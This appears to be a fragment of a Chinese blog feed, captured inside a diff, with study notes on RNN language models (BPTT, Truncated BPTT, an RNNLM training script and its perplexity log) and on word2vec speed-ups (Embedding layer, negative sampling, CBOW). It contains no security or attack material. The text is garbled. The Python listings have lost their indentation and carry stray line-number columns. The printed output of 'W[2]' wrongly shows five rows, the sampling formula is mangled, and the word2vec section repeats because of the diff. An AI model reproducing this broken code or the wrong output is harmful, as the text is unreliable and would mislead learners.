    $$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

    RNN 的 $h$ 存储“状态”,时间每前进一步(一个单位),它就以上式的形式被更新。许多文献中将 RNN 的输出 $h_t$ 称为隐藏状态(hidden state)隐藏状态向量(hidden state vector),本书中也是如此。

    5.2.3 Backpropagation Through Time

    将循环展开后的 RNN 可以使用(常规的)误差反向传播法。换句话说,可以通过先进行正向传播,再进行反向传播的方式求目标梯度。因为这里的误差反向传播法是“按时间顺序展开的神经网络的误差反向传播法”,所以称为 Backpropagation Through Time(基于时间的反向传播),简称BPTT

    5.2.4 Truncated BPTT

    在处理长时序数据时,通常的做法是将网络连接截成适当的长度。具体来说,就是将时间轴方向上过长的网络在合适的位置进行截断,从而创建多个小型网络,然后对截出来的小型网络执行误差反向传播法,这个方法称为 Truncated BPTT(截断的 BPTT)。

    Truncated 是“被截断”的意思。Truncated BPTT 是指按适当长度截断的误差反向传播法。

    5.2.5 Truncated BPTT 的 mini-batch 学习

    png

    通过 Truncated BPTT 进行学习的例子,对长度为 1000 的时序数据,以时间长度 10 为单位进行截断。此时,如何将批大小设为 2 进行学习呢?在这种情况下,作为 RNN 层的输入数据,第 1 笔样本数据从头开始按顺序输入,第 2 笔数据从第 500 个数据开始按顺序输入。也就是说,将开始位置平移 500。

    5.3 RNN 的实现

    png

    png

    $$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    class RNN:
    def __init__(self, Wx, Wh, b):
    self.params = [Wx, Wh, b]
    self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
    self.cache = None


    def forward(self, x, h_prev):
    """
    x: 从下方输入的数据
    h_prev: 从左边输入的数据
    """
    Wx, Wh, b = self.params
    t = np.dot(h_prev, Wh) + np.dot(x, Wx) + b
    h_next = np.tanh(t)
    self.cache = (x, h_prev, h_next)
    return h_next # 当前时刻的 RNN 层的输出(= 下一时刻的 RNN 层的输入)是 h_next


    def backward(self, dh_next):
    Wx, Wh, b = self.params
    x, h_prev, h_next = self.cache

    dt = dh_next * (1 - h_next ** 2)
    db = np.sum(dt, axis=0)
    dWh = np.dot(h_prev.T, dt)
    dh_prev = np.dot(dt, Wh.T)
    dWx = np.dot(x.T, dt)
    dx = np.dot(dt, Wx.T)

    self.grads[0][...] = dWx
    self.grads[1][...] = dWh
    self.grads[2][...] = db
    return dx, dh_prev

    5.3.2 Time RNN 层的实现

    Time RNN 层是 T 个 RNN 层连接起来的网络。我们将这个网络实现为 Time RNN 层。这里,RNN 层的隐藏状态 h 保存在成员变量中。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    class TimeRNN:
    def __init__(self, Wx, Wh, b, stateful=False):
    """
    layers: 在列表中保存多个 RNN 层
    h: 保存调用 forward() 方法时的最后一个 RNN 层的隐藏状态
    """
    self.params = [Wx, Wh, b]
    self.grads = [np.zeros_like(Wx), np.zeros_like(Wh),
    np.zeros_like(b)]
    self.layers = None
    self.h, self.dh = None, None
    self.stateful = stateful


    def set_state(self, h):
    self.h = h


    def reset_state(self):
    self.h = None


    def forward(self, xs):
    Wx, Wh, b = self.params
    N, T, D = xs.shape
    D, H = Wx.shape

    self.layers = []
    hs = np.empty((N, T, H), dtype='f')

    if not self.stateful or self.h is None:
    self.h = np.zeros((N, H), dtype='f')

    for t in range(T):
    layer = RNN(*self.params)
    self.h = layer.forward(xs[:, t, :], self.h)
    hs[:, t, :] = self.h
    self.layers.append(layer)
    return hs


    def backward(self, dhs):
    Wx, Wh, b = self.params
    N, T, H = dhs.shape
    D, H = Wx.shape

    dxs = np.empty((N, T, D), dtype='f')
    dh = 0
    grads = [0, 0, 0]
    for t in reversed(range(T)):
    layer = self.layers[t]
    dx, dh = layer.backward(dhs[:, t, :] + dh) # 求和后的梯度
    dxs[:, t, :] = dx

    for i, grad in enumerate(layer.grads):
    grads[i] += grad

    for i, grad in enumerate(grads):
    self.grads[i][...] = grad
    self.dh = dh

    return dxs

    5.4 处理时序数据的层的实现

    我们将基于 RNN 的语言模型称为 RNNLM(RNN Language Model,RNN 语言模型)

    5.4.1 RNNLM 的全貌图

    png

    5.4.2 Time 层的实现

    实现为了 Time RNN 层,这里也同样使用 Time Embedding 层、Time Affine 层等来实现整体处理时序数据的层。

    5.5 RNNLM 的学习和评价

    5.5.1 RNNLM 的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    import sys
    sys.path.append('..')
    import numpy as np
    from common.time_layers import *


    class SimpleRnnlm:
    def __init__(self, vocab_size, wordvec_size, hidden_size):
    V, D, H = vocab_size, wordvec_size, hidden_size
    rn = np.random.randn
    # 初始化权重
    embed_W = (rn(V, D) / 100).astype('f')
    rnn_Wx = (rn(D, H) / np.sqrt(D)).astype('f')
    rnn_Wh = (rn(H, H) / np.sqrt(H)).astype('f')
    rnn_b = np.zeros(H).astype('f')
    affine_W = (rn(H, V) / np.sqrt(H)).astype('f')
    affine_b = np.zeros(V).astype('f')

    # 生成层
    self.layers = [
    TimeEmbedding(embed_W),
    TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),
    TimeAffine(affine_W, affine_b)
    ]
    self.loss_layer = TimeSoftmaxWithLoss()
    self.rnn_layer = self.layers[1]

    # 将所有的权重和梯度整理到列表中
    self.params, self.grads = [], []
    for layer in self.layers:
    self.params += layer.params
    self.grads += layer.grads


    def forward(self, xs, ts):
    for layer in self.layers:
    xs = layer.forward(xs)
    loss = self.loss_layer.forward(xs, ts)
    return loss


    def backward(self, dout=1):
    dout = self.loss_layer.backward(dout)
    for layer in reversed(self.layers):
    dout = layer.backward(dout)
    return dout


    def reset_state(self):
    self.rnn_layer.reset_state()

    5.5.2 语言模型的评价

    **困惑度(perplexity)**常被用作评价语言模型的预测性能的指标。困惑度表示“概率的倒数”(这个解释在数据量为 1 时严格一
    致)。

    “模型 1”能准确地预测,困惑度是 1.25;“模型 2”的预测未能命中,困惑度是 5.0。此例表明,困惑度越小越好。

    在输入数据为多个时:

    $$L=-\frac{1}{N}\sum_n\sum_kt_{nk}\log y_{nk}\ 困惑度=e^L$$

    $N$:数据量

    $t_n$:one-hot 向量形式的正确解标签

    $t_{nk}$:第 $n$ 个数据的第 $k$ 个值

    $y_{nk}$:概率分布(神经网络中的 Softmax 的输出)

    5.5.3 RNNLM 的学习代码

    下面,我们使用 PTB 数据集进行学习,不过这里仅使用 PTB 数据集(训练数据)的前 1000 个单词。这是因为在本节实现的 RNNLM 中,即便使用所有的训练数据,也得不出好的结果。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    import sys
    sys.path.append('..')
    import matplotlib.pyplot as plt
    import numpy as np
    from common.optimizer import SGD
    from dataset import ptb


    # 设定超参数
    batch_size = 10
    wordvec_size = 100
    hidden_size = 100
    time_size = 5 # Truncated BPTT 的时间跨度大小
    lr = 0.1
    max_epoch = 100

    # 读入训练数据(缩小了数据集)
    corpus, word_to_id, id_to_word = ptb.load_data('train')
    corpus_size = 1000
    corpus = corpus[:corpus_size]
    vocab_size = int(max(corpus) + 1)

    xs = corpus[:-1] # 输入
    ts = corpus[1:] # 输出(监督标签)
    data_size = len(xs)
    print('corpus size: %d, vocabulary size: %d' % (corpus_size, vocab_size))

    # 学习用的参数
    max_iters = data_size // (batch_size * time_size)
    time_idx = 0
    total_loss = 0
    loss_count = 0
    ppl_list = []

    # 生成模型
    model = SimpleRnnlm(vocab_size, wordvec_size, hidden_size)
    optimizer = SGD(lr)

    # 计算读入 mini-batch 的各笔样本数据的开始位置
    jump = (corpus_size - 1) // batch_size
    offsets = [i * jump for i in range(batch_size)]

    for epoch in range(max_epoch):
    for iter in range(max_iters):
    # 获取 mini-batch
    batch_x = np.empty((batch_size, time_size), dtype='i')
    batch_t = np.empty((batch_size, time_size), dtype='i')
    for t in range(time_size):
    for i, offset in enumerate(offsets):
    batch_x[i, t] = xs[(offset + time_idx) % data_size]
    batch_t[i, t] = ts[(offset + time_idx) % data_size]
    time_idx += 1

    # 计算梯度,更新参数
    loss = model.forward(batch_x, batch_t)
    model.backward()
    optimizer.update(model.params, model.grads)
    total_loss += loss
    loss_count += 1

    # 各个 epoch 的困惑度评价
    ppl = np.exp(total_loss / loss_count)
    print('| epoch %d | perplexity %.2f'
    % (epoch+1, ppl))
    ppl_list.append(float(ppl))
    total_loss, loss_count = 0, 0

    # 绘制图形
    x = np.arange(len(ppl_list))
    plt.plot(x, ppl_list, label='train')
    plt.xlabel('epochs')
    plt.ylabel('perplexity')
    plt.show()
    corpus size: 1000, vocabulary size: 418| epoch 1 | perplexity 381.82| epoch 2 | perplexity 249.18| epoch 3 | perplexity 221.29| epoch 4 | perplexity 215.43| epoch 5 | perplexity 207.15| epoch 6 | perplexity 203.17| epoch 7 | perplexity 198.93| epoch 8 | perplexity 195.85| epoch 9 | perplexity 191.45| epoch 10 | perplexity 192.29| epoch 11 | perplexity 188.65| epoch 12 | perplexity 191.66| epoch 13 | perplexity 189.51| epoch 14 | perplexity 189.71| epoch 15 | perplexity 189.52| epoch 16 | perplexity 185.28| epoch 17 | perplexity 183.06| epoch 18 | perplexity 180.49| epoch 19 | perplexity 181.37| epoch 20 | perplexity 184.87| epoch 21 | perplexity 180.87| epoch 22 | perplexity 178.83| epoch 23 | perplexity 174.18| epoch 24 | perplexity 176.73| epoch 25 | perplexity 172.20| epoch 26 | perplexity 172.87| epoch 27 | perplexity 170.56| epoch 28 | perplexity 166.38| epoch 29 | perplexity 162.95| epoch 30 | perplexity 157.38| epoch 31 | perplexity 157.81| epoch 32 | perplexity 152.31| epoch 33 | perplexity 154.94| epoch 34 | perplexity 146.07| epoch 35 | perplexity 145.13| epoch 36 | perplexity 139.85| epoch 37 | perplexity 136.63| epoch 38 | perplexity 133.32| epoch 39 | perplexity 125.23| epoch 40 | perplexity 121.62| epoch 41 | perplexity 121.58| epoch 42 | perplexity 115.46| epoch 43 | perplexity 109.48| epoch 44 | perplexity 104.39| epoch 45 | perplexity 99.35| epoch 46 | perplexity 98.50| epoch 47 | perplexity 93.12| epoch 48 | perplexity 87.29| epoch 49 | perplexity 84.13| epoch 50 | perplexity 80.55| epoch 51 | perplexity 77.43| epoch 52 | perplexity 72.89| epoch 53 | perplexity 68.34| epoch 54 | perplexity 65.69| epoch 55 | perplexity 61.66| epoch 56 | perplexity 59.06| epoch 57 | perplexity 55.59| epoch 58 | perplexity 51.44| epoch 59 | perplexity 50.10| epoch 60 | perplexity 47.76| epoch 61 | perplexity 46.54| epoch 62 | perplexity 42.07| epoch 63 | perplexity 38.95| epoch 64 | perplexity 36.56| epoch 65 | perplexity 36.69| epoch 66 | perplexity 34.47| epoch 67 | perplexity 33.12| epoch 68 | perplexity 29.81| epoch 69 | perplexity 28.68| epoch 70 | perplexity 28.15| epoch 71 | perplexity 25.35| epoch 72 | perplexity 24.31| epoch 73 | perplexity 23.32| epoch 74 | perplexity 21.55| epoch 75 | perplexity 21.12| epoch 76 | perplexity 19.21| epoch 77 | perplexity 18.71| epoch 78 | perplexity 17.76| epoch 79 | perplexity 16.01| epoch 80 | perplexity 15.20| epoch 81 | perplexity 14.74| epoch 82 | perplexity 14.76| epoch 83 | perplexity 12.86| epoch 84 | perplexity 12.45| epoch 85 | perplexity 11.71| epoch 86 | perplexity 11.20| epoch 87 | perplexity 10.99| epoch 88 | perplexity 10.09| epoch 89 | perplexity 9.84| epoch 90 | perplexity 9.20| epoch 91 | perplexity 8.68| epoch 92 | perplexity 8.12| epoch 93 | perplexity 7.94| epoch 94 | perplexity 7.49| epoch 95 | perplexity 7.43| epoch 96 | perplexity 6.77| epoch 97 | perplexity 6.63| epoch 98 | perplexity 6.58| epoch 99 | perplexity 6.19| epoch 100 | perplexity 5.84

    png

    5.5.4 RNNLM 的 Trainer 类

    • 按顺序生成 mini-batch

    • 调用模型的正向传播和反向传播

    • 使用优化器更新权重

    • 评价困惑度

    5.6 小结

    • RNN 具有环路,因此可以在内部记忆隐藏状态

    • 通过展开 RNN 的循环,可以将其解释为多个 RNN 层连接起来的神经网络,可以通过常规的误差反向传播法进行学习(= BPTT)

    • 在学习长时序数据时,要生成长度适中的数据块,进行以块为单位的 BPTT 学习(= Truncated BPTT)

    • Truncated BPTT 只截断反向传播的连接

    • 在 Truncated BPTT 中,为了维持正向传播的连接,需要按顺序输入数据

    • 语言模型将单词序列解释为概率

    • 理论上,使用 RNN 层的条件语言模型可以记忆所有已出现单词的信息

    ]]>
    @@ -7955,7 +7955,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-4-word2vec%E9%AB%98%E9%80%9F%E5%8C%96/ - 正文

    4.1 word2vec 的改进 1

    对于 CBOW 模型,在处理大规模语料库时,就会出现问题。

    假设词汇量有 100 万个,CBOW 模型的中间层神经元有 100 个,输入层和输出层存在 100 万个神经元。在如此多的神经
    元的情况下,中间的计算过程需要很长时间。

    出现问题:

    • 输入层的 one-hot 表示和权重矩阵 $W_{in}$ 的乘积

      • 在词汇量有 100 万个的情况下,仅 one-hot 表示本身就需要占用 100 万个元素的内存大小。此外,还需要计算 one-hot 表示和权重矩阵 $W_{in}$ 的乘积,这也要花费大量的计算资源。
        • 通过引入新的 Embedding 层来解决
    • 中间层和权重矩阵 $W_{out}$ 的乘积以及 Softmax 层的计算

      • 中间层和权重矩阵 $W_{out}$ 的乘积需要大量的计算。其次,随着词汇量的增加,Softmax 层的计算量也会增加

        • 引入新的损失函数 Negative Sampling 来解决

    4.1.1 Embedding 层

    如果语料库的词汇量有 100 万个,则单词的 one-hot 表示的维数也会是 100 万,我们需要计算这个巨大向量和权重矩阵的乘积。

    直觉上将单词转化为 one-hot 向量的处理和 MatMul 层中的矩阵乘法似乎没有必要。

    创建一个从权重参数中抽取“单词 ID 对应行(向量)”的层,这里我们称之为 Embedding 层。

    这个 Embedding 层存放词嵌入(分布式表示)。

    在自然语言处理领域,单词的密集向量表示称为词嵌入(word embedding)或者单词的分布式表示(distributed representation)

    4.1.2 Embedding 层的实现

    从矩阵中取出某一行的处理是很容易实现的。这里,假设权重 W 是 NumPy 的二维数组。如果要从这个权重中取出某个特定的行,只需写 W[2]
    或者 W[5]

    import numpy as np
    W = np.arange(21).reshape(7, 3)
    W
    array([[ 0,  1,  2],       [ 3,  4,  5],       [ 6,  7,  8],       [ 9, 10, 11],       [12, 13, 14],       [15, 16, 17],       [18, 19, 20]])
    W[2]
    array([[ 6,  7,  8],       [ 9, 10, 11],       [12, 13, 14],       [15, 16, 17],       [18, 19, 20]])

    从权重 W 中一次性提取多行的处理也很简单。只需通过数组指定行号即可。

    idx = np.array([1, 0, 3, 0])
    W[idx]
    array([[ 3,  4,  5],       [ 0,  1,  2],       [ 9, 10, 11],       [ 0,  1,  2]])

    实现 Embedding 层的 forward()backward()方法:

    class Embedding:
    def __init__(self, W):
    """
    使用 params 和 grads 作为成员变量
    """
    self.params = [W]
    self.grads = [np.zeros_like(W)]
    self.idx = None


    def forward(self, idx):
    """
    在成员变量 idx 中以数组的形式保存需要提取的行的索引(单词 ID)
    在反向传播时,从上一层(输出侧的层)传过来的梯度将原样传给下一层(输入侧的层)。
    不过,从上一层传来的梯度会被应用到权重梯度 dW 的特定行(idx)
    """
    W, = self.params
    self.idx = idx
    out = W[idx]
    return out


    def backward(self, dout):
    dW, = self.grads
    dW[...] = 0

    """
    dW[self.idx] = dout 是不太好的方式,存在一个问题,
    这一问题发生在 idx 的元素出现重复时,其中某个值就会被覆盖掉。
    """
    for i, word_id in enumerate(self.idx):
    dW[word_id] += dout[i]
    # 或者
    # np.add.at(dW, self.idx, dout)
    return None

    4.2 word2vec 的改进 2

    采用名为**负采样(negative sampling)**的方法作为解决方案。使用 Negative Sampling 替代 Softmax,无论词汇量有多大,都可以使计算量保持较低或恒定。

    4.2.1 中间层之后的计算问题

    png

    输入层和输出层有 100 万个神经元。在上一节中,通过引入 Embedding 层,节省了输入层中不必要的计算。剩下的问题就是中间层之后的处理。此时,在以下两个地方需要很多计算时间。

    • 中间层的神经元和权重矩阵($W_{out}$)的乘积

      • 问题在于巨大的矩阵乘积计算。在上面的例子中,中间层向量的大小是 100,权重矩阵的大小是 100 × 1 000 000 万,如此巨大的矩阵乘积计算需要大量时间(也需要大量内存)。此外,因为反向传播时也要进行同样的计算,所以很有必要将矩阵乘积计算“轻量化”。
    • Softmax 层的计算

      • 随着词汇量的增加,Softmax 的计算量也会增加,这个计算量与词汇量成正比。

    4.2.2 从多分类到二分类

    现在,我们来考虑如何将多分类问题转化为二分类问题。为此,我们先考察一个可以用“Yes/No”来回答的问题。比如,让神经网络来回答“当上下文是 you 和 goodbye 时,目标词是 say 吗?”这个问题,这时输出层只需要一个神经元即可。可以认为输出层的神经元输出的是 say 的得分。

    输出层的神经元仅有一个。因此,要计算中间层和输出侧的权重矩阵的乘积,只需要提取 say 对应的列(单词向量),并用它与中间层的神经元计算内积即可。

    4.2.3sigmoid 函数和交叉熵误差

    在多分类的情况下,输出层使用 Softmax 函数将得分转化为概率,损失函数使用交叉熵误差。在二分类的情况下,输出层使用 sigmoid 函数,损失函数也使用交叉熵误差。

    通过 sigmoid 函数得到概率 $y$ 后,可以由概率 $y$ 计算损失。与多分类一样,用于 sigmoid 函数的损失函数也是交叉熵误差,其数学式如下所示:

    $$L=-(t\log y+(1-t)\log(1-y))$$

    其中,$y$ 是 sigmoid 函数的输出,$t$ 是正确解标签,取值为 0 或 1;取值为 1 时表示正确解是“Yes”;取值为 0 时表示正确解是“No”。因此,当 $t$ 为 1 时,输出 $−\log y$;当 $t$ 为 0 时,输出 $−\log (1 − y)$。

    4.2.4 多分类到二分类的实现

    引入 Embedding Dot 层,该层将 Embedding 层和 dot 运算(内积)合并起来处理。

    class EmbeddingDot:
    def __init__(self, W):
    """
    params: 保存参数
    grads: 保存梯度
    embed: 保存 Embedding 层作为缓存
    cache: 保存正向传播时的计算结果
    """
    self.embed = Embedding(W)
    self.params = self.embed.params
    self.grads = self.embed.grads
    self.cache = None


    def forward(self, h, idx):
    target_W = self.embed.forward(idx)
    out = np.sum(target_W * h, axis=1)
    self.cache = (h, target_W)
    return out


    def backward(self, dout):
    h, target_W = self.cache
    dout = dout.reshape(dout.shape[0], 1)
    dtarget_W = dout * h
    self.embed.backward(dtarget_W)
    dh = dout * target_W
    return dh

    4.2.5 负采样

    png

    我们目前仅学习了正例(正确答案),还不确定负例(错误答案)会有怎样的结果。

    当前的神经网络只是学习了正例 say,但是对 say 之外的负例一无所知。

    而我们真正要做的事情是,对于正例(say),使 Sigmoid 层的输出接近 1;对于负例(say 以外的单词),使 Sigmoid 层的输出接近 0。

    那么,我们需要以所有的负例为对象进行学习吗?答案显然是“No”。如果以所有的负例为对象,词汇量将暴增至无法处理(更何况本章的目的本来就是解决词汇量增加的问题)。为此,作为一种近似方法,我们将选择若干个(5 个或者 10 个)负例(如何选择将在下文介绍)。也就是说,只使用少数负例。这就是负采样方法的含义。

    4.2.6 负采样的采样方法

    基于语料库中各个单词的出现次数求出概率分布后,只需根据这个概率分布进行采样就可以了。通过根据概率分布进行采样,语料库中经常出现的单词将容易被抽到,而“稀有单词”将难以被抽到。

    使用 Python 来说明基于概率分布的采样:

    # 从 0 到 9 的数字中随机选择一个数字
    np.random.choice(10)
    4
    # 从 words 列表中随机选择一个元素
    words = ['you', 'say', 'goodbye', 'I', 'hello', '.']
    np.random.choice(words)
    'goodbye'
    # 有放回采样 5 次
    np.random.choice(words, size=5)
    array(['you', '.', 'say', 'hello', 'say'], dtype='<U7')
    # 无放回采样 5 次
    np.random.choice(words, size=5, replace=False)
    array(['goodbye', 'I', 'say', 'you', 'hello'], dtype='<U7')
    # 基于概率分布进行采样
    p = [0.5, 0.1, 0.05, 0.2, 0.05, 0.1]
    np.random.choice(words, p=p)
    'I'

    word2vec 中提出的负采样对刚才的概率分布增加了一个步骤。如下式所示,对原来的概率分布取 0.75 次方。

    $$P’(w_i)=\frac{P(w_i){0.75}}{\sumn_jP(w_j)^{0.75}}$$

    为了防止低频单词被忽略。更准确地说,通过取 0.75 次方,低频单词的概率将稍微变高。

    p = [0.7, 0.29, 0.01]
    new_p = np.power(p, 0.75)
    new_p /= np.sum(new_p)
    print(new_p)
    [0.64196878 0.33150408 0.02652714]

    根据这个例子,变换前概率为 0.01(1%)的元素,变换后为 0.026…(2.6…%)。通过这种方式,取 0.75 次方作为一种补救措施,使得低频单词稍微更容易被抽到。

    此外,0.75 这个值并没有什么理论依据,也可以设置成 0.75 以外的值。

    corpus = np.array([0, 1, 2, 3, 4, 1, 2, 3])
    power = 0.75
    sample_size = 2
    # 该方法以参数 target 指定的单词 ID 为正例,对其他的单词 ID 进行采样。
    sampler = UnigramSampler(corpus, power, sample_size)
    target = np.array([1, 3, 0])
    negative_sample = sampler.get_negative_sample(target)
    print(negative_sample)

    4.2.7 负采样的实现

    class NegativeSamplingLoss:
    def __init__(self, W, corpus, power=0.75, sample_size=5):
    self.sample_size = sample_size
    self.sampler = UnigramSampler(corpus, power, sample_size)
    self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
    self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
    self.params, self.grads = [], []
    for layer in self.embed_dot_layers:
    self.params += layer.params
    self.grads += layer.grads


    def forward(self, h, target):
    """
    h: 中间层的神经元
    target: 正例目标
    """
    batch_size = target.shape[0]
    # 使用 self.sampler 采样负例,并设为 negative_sample
    negative_sample = self.sampler.get_negative_sample(target)

    # 正例的正向传播
    score = self.embed_dot_layers[0].forward(h, target)
    correct_label = np.ones(batch_size, dtype=np.int32) # 正例的正确解标签为 1
    loss = self.loss_layers[0].forward(score, correct_label)

    # 负例的正向传播
    negative_label = np.zeros(batch_size, dtype=np.int32) # 负例的正确解标签为 0
    for i in range(self.sample_size):
    negative_target = negative_sample[:, i]
    score = self.embed_dot_layers[1 + i].forward(h, negative_target)
    loss += self.loss_layers[1 + i].forward(score, negative_label)

    return loss


    def backward(self, dout=1):
    dh = 0
    for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
    """
    与正向传播相反的顺序调用各层的 backward() 函数即可
    """
    dscore = l0.backward(dout)
    dh += l1.backward(dscore)
    return dh

    4.3 改进版 word2vec 的学习

    4.3.1 CBOW 模型的实现

    png

    import sys
    sys.path.append('..')
    from common.np import * # import numpy as np
    from common.layers import Embedding
    from ch04.negative_sampling_layer import NegativeSamplingLoss


    class CBOW:
    def __init__(self, vocab_size, hidden_size, window_size, corpus):
    V, H = vocab_size, hidden_size

    # 初始化权重
    W_in = 0.01 * np.random.randn(V, H).astype('f')
    W_out = 0.01 * np.random.randn(V, H).astype('f')

    # 生成层
    self.in_layers = []
    for i in range(2 * window_size):
    layer = Embedding(W_in) # 使用 Embedding 层
    self.in_layers.append(layer)
    self.ns_loss = NegativeSamplingLoss(W_out, corpus, power=0.75, sample_size=5)

    # 将所有的权重和梯度整理到列表中
    layers = self.in_layers + [self.ns_loss]
    self.params, self.grads = [], []
    for layer in layers:
    self.params += layer.params
    self.grads += layer.grads

    # 将单词的分布式表示设置为成员变量
    self.word_vecs = W_in


    def forward(self, contexts, target):
    h = 0
    for i, layer in enumerate(self.in_layers):
    h += layer.forward(contexts[:, i])
    h *= 1 / len(self.in_layers)
    loss = self.ns_loss.forward(h, target)
    return loss


    def backward(self, dout=1):
    dout = self.ns_loss.backward(dout)
    dout *= 1 / len(self.in_layers)
    for layer in self.in_layers:
    layer.backward(dout)
    return None

    4.3.2 CBOW 模型的学习代码

    import sys
    sys.path.append('..')
    import numpy as np
    from common import config
    # 在用 GPU 运行时,请打开下面的注释(需要 cupy)
    # ===============================================
    config.GPU = True
    # ===============================================
    import pickle
    from common.trainer import Trainer
    from common.optimizer import Adam
    from common.util import create_contexts_target, to_cpu, to_gpu
    from dataset import ptb

    # 设定超参数
    window_size = 5
    hidden_size = 100
    batch_size = 100
    max_epoch = 10

    # 读入数据
    corpus, word_to_id, id_to_word = ptb.load_data('train')
    vocab_size = len(word_to_id)

    contexts, target = create_contexts_target(corpus, window_size)
    if config.GPU:
    contexts, target = to_gpu(contexts), to_gpu(target)

    # 生成模型等
    model = CBOW(vocab_size, hidden_size, window_size, corpus)
    optimizer = Adam()
    trainer = Trainer(model, optimizer)

    # 开始学习
    trainer.fit(contexts, target, max_epoch, batch_size)
    trainer.plot()

    # 保存必要数据,以便后续使用
    word_vecs = model.word_vecs
    if config.GPU:
    word_vecs = to_cpu(word_vecs)
    params = {}
    params['word_vecs'] = word_vecs.astype(np.float16)
    params['word_to_id'] = word_to_id
    params['id_to_word'] = id_to_word
    pkl_file = 'cbow_params.pkl'
    with open(pkl_file, 'wb') as f:
    pickle.dump(params, f, -1)

    4.3.3 CBOW 模型的评价

    import sys
    sys.path.append('..')
    from common.util import most_similar
    import pickle

    pkl_file = 'cbow_params.pkl'
    with open(pkl_file, 'rb') as f:
    params = pickle.load(f)
    word_vecs = params['word_vecs']
    word_to_id = params['word_to_id']
    id_to_word = params['id_to_word']

    querys = ['you', 'year', 'car', 'toyota']
    for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)

    4.4 word2vec 相关的其他话题

    4.4.1 word2vec 的应用例

    在自然语言处理领域,单词的分布式表示之所以重要,原因就在于迁移学习(transfer learning)。迁移学习是指在某个领域学到的知识可以被应用于其他领域。

    将单词和文档转化为固定长度的向量是非常重要的。因为如果可以将自然语言转化为向量,就可以使用常规的机器学习方法(神经网络、SVM 等)

    png

    4.4.2 单词向量的评价方法

    单词相似度的评价通常使用人工创建的单词相似度评价集来评估。比如,cat 和 animal 的相似度是 8,cat 和 car 的相似度是 2……类似这样,用 0~10 的分数人工地对单词之间的相似度打分。然后,比较人给出的分数和 word2vec 给出的余弦相似度,考察它们之间的相关性。

    4.5 小结

    • Embedding 层保存单词的分布式表示,在正向传播时,提取单词 ID 对应的向量

    • 因为 word2vec 的计算量会随着词汇量的增加而成比例地增加,所以最好使用近似计算来加速

    • 负采样技术采样若干负例,使用这一方法可以将多分类问题转化为二分类问题进行处理

    • 基于 word2vec 获得的单词的分布式表示内嵌了单词含义,在相似的上下文中使用的单词在单词向量空间上处于相近的位置

    • word2vec 的单词的分布式表示的一个特性是可以基于向量的加减法运算来求解类推问题

    • word2vec 的迁移学习能力非常重要,它的单词的分布式表示可以应用于各种各样的自然语言处理任务

    ]]>
    + 正文

    4.1 word2vec 的改进 1

    对于 CBOW 模型,在处理大规模语料库时,就会出现问题。

    假设词汇量有 100 万个,CBOW 模型的中间层神经元有 100 个,输入层和输出层存在 100 万个神经元。在如此多的神经
    元的情况下,中间的计算过程需要很长时间。

    出现问题:

    • 输入层的 one-hot 表示和权重矩阵 $W_{in}$ 的乘积

      • 在词汇量有 100 万个的情况下,仅 one-hot 表示本身就需要占用 100 万个元素的内存大小。此外,还需要计算 one-hot 表示和权重矩阵 $W_{in}$ 的乘积,这也要花费大量的计算资源。
        • 通过引入新的 Embedding 层来解决
    • 中间层和权重矩阵 $W_{out}$ 的乘积以及 Softmax 层的计算

      • 中间层和权重矩阵 $W_{out}$ 的乘积需要大量的计算。其次,随着词汇量的增加,Softmax 层的计算量也会增加

        • 引入新的损失函数 Negative Sampling 来解决

    4.1.1 Embedding 层

    如果语料库的词汇量有 100 万个,则单词的 one-hot 表示的维数也会是 100 万,我们需要计算这个巨大向量和权重矩阵的乘积。

    直觉上将单词转化为 one-hot 向量的处理和 MatMul 层中的矩阵乘法似乎没有必要。

    创建一个从权重参数中抽取“单词 ID 对应行(向量)”的层,这里我们称之为 Embedding 层。

    这个 Embedding 层存放词嵌入(分布式表示)。

    在自然语言处理领域,单词的密集向量表示称为词嵌入(word embedding)或者单词的分布式表示(distributed representation)

    4.1.2 Embedding 层的实现

    从矩阵中取出某一行的处理是很容易实现的。这里,假设权重 W 是 NumPy 的二维数组。如果要从这个权重中取出某个特定的行,只需写 W[2]
    或者 W[5]

    1
    2
    3
    import numpy as np
    W = np.arange(21).reshape(7, 3)
    W
    array([[ 0,  1,  2],       [ 3,  4,  5],       [ 6,  7,  8],       [ 9, 10, 11],       [12, 13, 14],       [15, 16, 17],       [18, 19, 20]])
    1
    W[2]
    array([[ 6,  7,  8],       [ 9, 10, 11],       [12, 13, 14],       [15, 16, 17],       [18, 19, 20]])

    从权重 W 中一次性提取多行的处理也很简单。只需通过数组指定行号即可。

    1
    2
    idx = np.array([1, 0, 3, 0])
    W[idx]
